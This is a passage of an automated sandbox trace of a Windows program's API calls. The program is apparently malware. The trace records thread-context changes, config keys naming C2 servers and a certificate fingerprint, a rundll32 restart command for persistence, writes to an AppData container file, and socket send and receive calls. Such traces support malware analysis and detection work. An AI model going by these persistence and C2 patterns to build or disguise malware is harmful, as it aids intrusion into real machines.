[249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0089.512] SetThreadContext (hThread=0x2f8, lpContext=0x516f55c*(ContextFlags=0x1003f, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x27f, FloatSave.StatusWord=0x0, FloatSave.TagWord=0xffff, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0xb0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x167abf, Ebp=0x0, Eip=0x76f801c4, SegCs=0x23, EFlags=0x202, Esp=0xcfb38, SegSs=0x2b, ExtendedRegisters=([0]=0x7f, [1]=0x2, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x80, [25]=0x1f, [26]=0x0, [27]=0x0, [28]=0xff, [29]=0xff, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0089.512] VirtualFree (lpAddress=0x5c90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.514] _snprintf (in: _Dest=0x516f7f0, _Count=0x3f, _Format="%d" | out: _Dest="1212") returned 4 [0089.514] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.514] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.514] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.514] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.514] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.514] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.514] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.514] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.514] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.514] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.514] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.514] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.515] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.515] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.515] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.515] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.515] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.515] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.515] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.515] strlen (_Str="1212") returned 0x4 [0089.515] strcmp (_Str1="core.crash_handler_pid", _Str2="core.crash_handler") returned 1 [0089.515] strcmp (_Str1="core.crash_handler_pid", _Str2="core.installed_file") returned -1 [0089.515] strcmp (_Str1="core.crash_handler_pid", _Str2="core.restart_cmd") returned -1 [0089.515] strcmp (_Str1="core.crash_handler_pid", _Str2="core.servers") returned -1 [0089.515] strcmp (_Str1="core.crash_handler_pid", _Str2="core.cert_fp") returned 1 [0089.515] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.515] strlen (_Str="1212") returned 0x4 [0089.515] strlen (_Str="core") returned 0x4 [0089.515] strlen (_Str="core") returned 0x4 [0089.515] strlen (_Str="core") returned 0x4 [0089.518] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0089.520] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x0) returned 0x102 [0089.520] SetEvent (hEvent=0x1dc) returned 1 [0089.520] RegisterWaitForSingleObject (in: phNewWaitObject=0x2601a14, hObject=0x2a4, Callback=0x4de25a8, Context=0x26019fc, dwMilliseconds=0xffffffff, dwFlags=0x8 | out: phNewWaitObject=0x2601a14*=0x2dab8c0) returned 1 [0089.520] ResumeThread (hThread=0x2f8) returned 0x1 [0089.520] CloseHandle (hObject=0x2f8) returned 1 [0089.520] strlen (_Str="core.restart_cmd") returned 0x10 [0089.520] strlen (_Str="rundll32.exe \"C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll\",Main event1") returned 0x77 [0089.520] strlen (_Str="core") returned 0x4 [0089.520] strlen (_Str="core") returned 0x4 [0089.520] strlen (_Str="core") returned 0x4 [0089.532] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0089.534] strlen (_Str="install_svc") returned 0xb [0089.534] strlen (_Str="core") returned 0x4 [0089.534] strlen (_Str="install_svc") returned 0xb [0089.534] strlen (_Str="install_svc") returned 0xb [0089.534] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.534] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.534] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.534] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.535] strlen (_Str="core") returned 0x4 [0089.535] strlen (_Str="core.task_name") returned 0xe [0089.535] strlen (_Str="core.task_name") returned 0xe [0089.535] strlen (_Str="core.task_name") returned 0xe [0089.535] strlen (_Str="core.task_name") returned 0xe [0089.535] strlen (_Str="core.task_name") returned 0xe [0089.535] strlen (_Str="core.task_name") returned 0xe [0089.535] strlen (_Str="core.task_name") returned 0xe [0089.535] strlen (_Str="core.task_name") returned 0xe [0089.535] strlen (_Str="core.task_name") returned 0xe [0089.536] strlen (_Str="core.task_name") returned 0xe [0089.536] strlen (_Str="core.task_name") returned 0xe [0089.536] strlen (_Str="core.task_name") returned 0xe [0089.536] strlen (_Str="core.task_name") returned 0xe [0089.536] strlen (_Str="core.task_name") returned 0xe [0089.536] strlen (_Str="core.task_name") returned 0xe [0089.536] strlen (_Str="core.task_name") returned 0xe [0089.536] strlen (_Str="core.task_name") returned 0xe [0089.536] strlen (_Str="core.task_name") returned 0xe [0089.536] strlen (_Str="core.task_name") returned 0xe [0089.536] strlen (_Str="core.task_name") returned 0xe [0089.536] strlen (_Str="407dad5a-b5c6-4985-9878-a37532f9a55f") returned 0x24 [0089.536] strcmp (_Str1="core.task_name", _Str2="core.crash_handler") returned 1 [0089.536] strcmp (_Str1="core.task_name", _Str2="core.installed_file") returned 1 [0089.536] strcmp (_Str1="core.task_name", _Str2="core.restart_cmd") returned 1 [0089.536] strcmp (_Str1="core.task_name", _Str2="core.servers") returned 1 [0089.536] strcmp (_Str1="core.task_name", _Str2="core.cert_fp") returned 1 [0089.536] strlen (_Str="core.task_name") returned 0xe [0089.536] strlen (_Str="407dad5a-b5c6-4985-9878-a37532f9a55f") returned 0x24 [0089.536] strlen (_Str="core") returned 0x4 [0089.536] strlen (_Str="core") returned 0x4 [0089.536] strlen (_Str="core") returned 0x4 [0089.539] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0089.541] strlen (_Str="install_svc") returned 0xb [0089.541] strlen (_Str="core") returned 0x4 [0089.541] strlen (_Str="install_svc") returned 0xb [0089.541] strlen (_Str="install_svc") returned 0xb [0089.541] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.541] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.541] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.542] strlen (_Str="core") returned 0x4 [0089.542] strlen (_Str="install_svc") returned 0xb [0089.542] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x30, buf=0x2621140*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x30, buf=0x2621140*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0089.542] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.542] strlen (_Str="install_svc") returned 0xb [0089.542] strlen (_Str="core") returned 0x4 [0089.543] strlen (_Str="install_svc") returned 0xb [0089.543] strlen (_Str="install_svc") returned 0xb [0089.543] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.543] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.775] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0089.775] GetLastError () returned 0x3e5 [0089.775] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.775] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.778] strlen (_Str="core") returned 0x4 [0089.778] UnregisterWaitEx (WaitHandle=0x2dab8c0, CompletionEvent=0x300) returned 1 [0089.778] SetEvent (hEvent=0x300) returned 1 [0089.778] WaitForSingleObject (hHandle=0x300, dwMilliseconds=0xffffffff) returned 0x0 [0089.778] ResetEvent (hEvent=0x1dc) returned 1 [0089.778] CloseHandle (hObject=0x300) returned 1 [0089.778] TerminateProcess (hProcess=0x2a4, uExitCode=0xa) returned 1 [0089.778] CloseHandle (hObject=0x2a4) returned 1 [0089.778] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.778] ExitProcess (uExitCode=0x0) Thread: id = 38 os_tid = 0xac4 [0043.631] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x7530) returned 0x102 [0073.660] PostQueuedCompletionStatus (CompletionPort=0x1e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0073.660] WaitForSingleObject (hHandle=0x224, dwMilliseconds=0x9c40) returned 0x0 [0073.660] ResetEvent (hEvent=0x224) returned 1 [0073.660] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x7530) Thread: id = 39 os_tid = 0xac8 [0044.368] ResetEvent (hEvent=0x234) returned 1 [0044.368] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0044.593] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0044.593] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0044.593] ResetEvent (hEvent=0x230) returned 1 [0044.593] ResetEvent (hEvent=0x234) returned 1 [0044.593] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0045.110] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0045.110] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0045.110] ResetEvent (hEvent=0x230) returned 1 [0045.110] ResetEvent (hEvent=0x234) returned 1 [0045.110] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0045.360] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0045.360] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0045.360] ResetEvent (hEvent=0x230) returned 1 [0045.360] ResetEvent (hEvent=0x234) returned 1 [0045.360] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0045.593] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0045.593] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0045.593] ResetEvent (hEvent=0x230) returned 1 [0045.593] ResetEvent (hEvent=0x234) returned 1 [0045.593] WaitForSingleObject (hHandle=0x234, 